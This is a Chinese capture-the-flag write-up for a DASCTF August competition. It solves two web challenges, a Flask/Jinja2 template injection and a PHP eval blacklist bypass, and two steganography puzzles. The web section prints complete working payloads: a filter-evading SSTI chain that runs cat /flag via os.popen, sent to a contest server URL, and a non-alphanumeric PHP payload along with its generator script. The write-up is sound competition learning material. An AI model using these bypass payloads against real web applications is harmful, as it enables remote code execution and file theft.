DAS八月安恒赛七夕单身狗wp

别人七夕陪对象过节

我七夕被比赛暴打连妈都不认识

不会吧不会吧，不会真有人七夕打比赛吧

WEB

EASYFLASK

遇见flask就不做的雪殇是屑，结束后看了眼y1ng师傅的wp，再推了一把，啊就这就这？flask就这？

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
app = Flask(__name__)


@app.route("/")
def index():
    def safe_jinja(s):
        blacklist = ['class', 'attr', 'mro', 'base',
                     'request', 'session', '+', 'add', 'chr', 'ord', 'redirect', 'url_for', 'config', 'builtins', 'get_flashed_messages', 'get', 'subclasses', 'form', 'cookies', 'headers', '[', ']', '\'', '"', '{}']
        flag = True
        for no in blacklist:
            if no.lower() in s.lower():
                flag = False
                break
        return flag
    if not request.args.get('name'):
        return open(__file__).read()
    elif safe_jinja(request.args.get('name')):
        name = request.args.get('name')
    else:
        name = 'wendell'
    template = '''

    <div class="center-content">
        <p>Hello, %s</p>
    </div>
    <!--flag in /flag-->
    <!--python3.8-->
''' % (name)
    return render_template_string(template)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

确实是原题，就是多了过滤，用globals找eval函数最后rce就行了

{% set xhx = (({ }|select()|string()|list()).pop(24)|string())%}  # _
{% set spa = ((app.__doc__|list()).pop(102)|string())%}  #空格
{% set pt = ((app.__doc__|list()).pop(320)|string())%}  #点
{% set yin = ((app.__doc__|list()).pop(337)|string())%}   #单引号
{% set left = ((app.__doc__|list()).pop(264)|string())%}   #左括号 （
{% set right = ((app.__doc__|list()).pop(286)|string())%}   #右括号）
{% set slas = (y1ng.__init__.__globals__.__repr__()|list()).pop(349)%}   #斜线/
{% set bu = dict(buil=aa,tins=dd)|join() %}  #builtins
{% set im = dict(imp=aa,ort=dd)|join() %}  #import
{% set sy = dict(po=aa,pen=dd)|join() %}  #popen
{% set os = dict(o=aa,s=dd)|join() %}  #os
{% set ca = dict(ca=aa,t=dd)|join() %}  #cat
{% set flg = dict(fl=aa,ag=dd)|join() %}  #flag
{% set ev = dict(ev=aa,al=dd)|join() %} #eval
{% set red = dict(re=aa,ad=dd)|join()%}  #read
{% set bul = xhx*2~bu~xhx*2 %}  #__builtins__

#拼接起来 __import__('os').popen('cat /flag').read()
{% set pld = xhx*2~im~xhx*2~left~yin~os~yin~right~pt~sy~left~yin~ca~spa~slas~flg~yin~right~pt~red~left~right %} 


{% for f,v in y1ng.__init__.__globals__.items() %} #globals
	{% if f == bul %} 
		{% for a,b in v.items() %}  #builtins
			{% if a == ev %} #eval
				{{b(pld)}} #eval(pld)
			{% endif %}
		{% endfor %}
	{% endif %}
{% endfor %}

我直接抄payload（不会flask不能自己构筑的屑

最后访问

http://183.129.189.60:10025/?name=?{%%20set%20xhx%20=%20(({%20}|select()|string()|list()).pop(24)|string())%}{%%20set%20spa%20=%20((app.__doc__|list()).pop(102)|string())%}{%%20set%20pt%20=%20((app.__doc__|list()).pop(320)|string())%}%20{%%20set%20yin%20=%20((app.__doc__|list()).pop(337)|string())%}{%%20set%20left%20=%20((app.__doc__|list()).pop(264)|string())%}%20{%%20set%20right%20=%20((app.__doc__|list()).pop(286)|string())%}%20{%%20set%20slas%20=%20(y1ng.__init__.__globals__.__repr__()|list()).pop(349)%}%20{%%20set%20bu%20=%20dict(buil=aa,tins=dd)|join()%20%}{%%20set%20im%20=%20dict(imp=aa,ort=dd)|join()%20%}{%%20set%20sy%20=%20dict(po=aa,pen=dd)|join()%20%}{%%20set%20os%20=%20dict(o=aa,s=dd)|join()%20%}%20{%%20set%20ca%20=%20dict(ca=aa,t=dd)|join()%20%}{%%20set%20flg%20=%20dict(fl=aa,ag=dd)|join()%20%}{%%20set%20ev%20=%20dict(ev=aa,al=dd)|join()%20%}%20{%%20set%20red%20=%20dict(re=aa,ad=dd)|join()%}{%%20set%20bul%20=%20xhx*2~bu~xhx*2%20%}{%%20set%20pld%20=%20xhx*2~im~xhx*2~left~yin~os~yin~right~pt~sy~left~yin~ca~spa~slas~flg~yin~right~pt~red~left~right%20%}%20{%%20for%20f,v%20in%20y1ng.__init__.__globals__.items()%20%}{%%20if%20f%20==%20bul%20%}{%%20for%20a,b%20in%20v.items()%20%}{%%20if%20a%20==%20ev%20%}{{b(pld)}}{%%20endif%20%}{%%20endfor%20%}{%%20endif%20%}{%%20endfor%20%}

RECME

<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('you are not smart');
    }
}
eval("echo($code)");
?>

这波，mz超神，

题目思路很简单，blacklist字母数字全过滤了，结尾eval还有点语法错误，正常思路就是构筑为

eval（”echo(1);phpinfo();)//);

然后通过脚本生成即可

a = '$_{'
b = '}.'
c = '!!_'

x = input()
re = ""
shit = ['a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z']
for i in x:
	re += a
	num = shit.index(i)
	for j in range(num):
		re += c
		if j < num-1:
			re+='+'
	re += b
	
print(re)

最终payload为

$_{!!});$_=$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.${!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!};$__=$_{!!+!!}.$_{!}.${!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.” /”.${!!+!!+!!+!!+!!}.${!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.${!}.${!!+!!+!!+!!+!!+!!};$__($___);//

MISC

双 重 图 格

像个傻逼一样对着二维码修了半天，结束为了神大人才知道怎么玩，佛了

神大人的blog：http://www.fzwjscj.xyz/index.php/archives/38/

打开数据表，全局搜索，然后可以发现提示

按照提示插入png内，获得apng一张，在浏览器中打开

获得关键帧

使用在线解密网站获得aes编码

U2FsdGVkX1/mLyhDqehTlmxmPoamVfr7h1El3iWRVvuJQodh1HvxMeQ2F8lgHfXzq70N4U/ZcjYtjLbXE8HRmw==

随后处理jpg，对文件尾进行补齐

获得全新图片

获得key：apngisamazing

最后解密：

DASCTF{b12e6674e844486d20d24793809ae38a}

标错的字符

开局直接朝着预期解奔过去了，可惜我不会

预期解就是写脚本批量识别图片，然后与文件名对比

当然非预期更快，直接搜索就完事了

字母为：x9sa5v0

md5加密后获得flag

287fe711b6c25ec4352df516e7f8cc33